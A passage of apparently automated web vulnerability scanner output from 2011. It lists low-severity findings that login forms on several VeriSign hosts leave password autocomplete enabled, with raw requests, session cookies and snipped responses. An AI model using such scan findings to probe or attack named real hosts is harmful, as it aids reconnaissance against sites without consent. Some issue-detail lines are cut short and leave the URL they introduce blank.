User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765

userName=xss&password=xss&submit=Sign+In

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:02 GMT
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 17164


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>


<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...
<td width="600" valign="top">
<form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8">
<table>
...[SNIP]...
<td>
<input type="password" name="password" maxlength="20" size="16" value="xss" style="width:130px;">
</td>
...[SNIP]...

11.19. https://products.verisign.com/geocenter/reseller/logon.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://products.verisign.com
Path:   /geocenter/reseller/logon.jsp

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /geocenter/reseller/logon.jsp HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:15 GMT
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 17095


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>


<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...
<td width="600" valign="top">
<form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8">
<table>
...[SNIP]...
<td>
<input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;">
</td>
...[SNIP]...

11.20. https://products.verisign.com/geocenter/reseller/register.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://products.verisign.com
Path:   /geocenter/reseller/register.do

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /geocenter/reseller/register.do?partner=verisignamerica HTTP/1.1
Host: products.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; JSESSIONID=hhyjTqGBLMJv7h9GbgyHDvJq3QYY5gY8yGM9GyGkjbGQWTH48hf1!1264420788; mbox=session#1315621455064-973488#1315623594|PC#1315621455064-973488.19#1378693734|check#true#1315621794; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.10.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-3-99____

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 09 Sep 2011 21:28:28 GMT
Pragma: No-cache
Content-Type: text/html;charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 17095


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>


<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...
<td width="600" valign="top">
<form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8">
<table>
...[SNIP]...
<td>
<input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;">
</td>
...[SNIP]...

11.21. http://query.verisign.ch/search

Summary

Severity:   Low
Confidence:   Certain
Host:   http://query.verisign.ch
Path:   /search

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /search HTTP/1.1
Host: query.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:19 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 43489
Connection: close


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do"
target="_blank">

                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.22. http://query.verisign.com/search

Summary

Severity:   Low
Confidence:   Certain
Host:   http://query.verisign.com
Path:   /search

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:07 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 52678


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...
<div class="partner_form">
                                           <form name="logonForm" id="partner_login" method="post" action="https://test-products.verisign.com/geocenter/reseller/logon.do"
target="_blank">

                                               <div>
...[SNIP]...
</label>
                                                   <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                               </div>
...[SNIP]...

11.23. https://query.verisign.com/search

Summary

Severity:   Low
Confidence:   Certain
Host:   https://query.verisign.com
Path:   /search

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /search HTTP/1.1
Host: query.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:20 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 44676
Connection: close


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...
<div class="partner_form">
                                           <form name="logonForm" id="partner_login" method="post" action="https://test-products.verisign.com/geocenter/reseller/logon.do"
target="_blank">

                                               <div>
...[SNIP]...
</label>
                                                   <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                               </div>
...[SNIP]...

11.24. https://ssl-certificate-center.verisign.ch/process/retail/console_login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"><input name="referrerPath" type="hidden" value="">
...[SNIP]...
</script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"><script language="JavaScript">
...[SNIP]...

11.25. https://ssl-certificate-center.verisign.com/process/retail/console_login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"><input name="referrerPath" type="hidden" value="">
...[SNIP]...
</script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"><script language="JavaScript">
...[SNIP]...

11.26. https://test-products.verisign.com/geocenter/reseller/logon.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://test-products.verisign.com
Path:   /geocenter/reseller/logon.do

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /geocenter/reseller/logon.do HTTP/1.1
Host: test-products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 17100


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>


<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...
<td width="600" valign="top">
<form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8">
<table>
...[SNIP]...
<td>
<input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;">
</td>
...[SNIP]...

11.27. https://trust-center.verisign.ch/process/retail/console_login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"><input name="referrerPath" type="hidden" value="">
...[SNIP]...
</script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"><script language="JavaScript">
...[SNIP]...

11.28. https://trust-center.verisign.com/process/retail/console_login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"><input name="referrerPath" type="hidden" value="">
...[SNIP]...
</script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"><script language="JavaScript">
...[SNIP]...

11.29. http://www.verisign.ch/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /?tid=header-logo HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 31344

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.30. http://www.verisign.ch/contact-information/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /contact-information/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /contact-information/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 39107

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="/assets/corp/css/corp_generic_st
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.31. http://www.verisign.ch/corporate/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /corporate/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /corporate/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 36193

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.32. http://www.verisign.ch/trust-seal/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /trust-seal/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 50059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VeriSign Trust Seal - Perfec
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.33. http://www.verisign.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:24:37 GMT
Content-Type: text/html
Content-Length: 34615

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.34. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581

Response

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-Type: text/html
Content-Length: 77864

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.35. http://www.verisign.com/code-signing/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /code-signing/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /code-signing/index.html?tid=a_box HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:27:08 GMT
Content-Type: text/html
Content-Length: 103179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

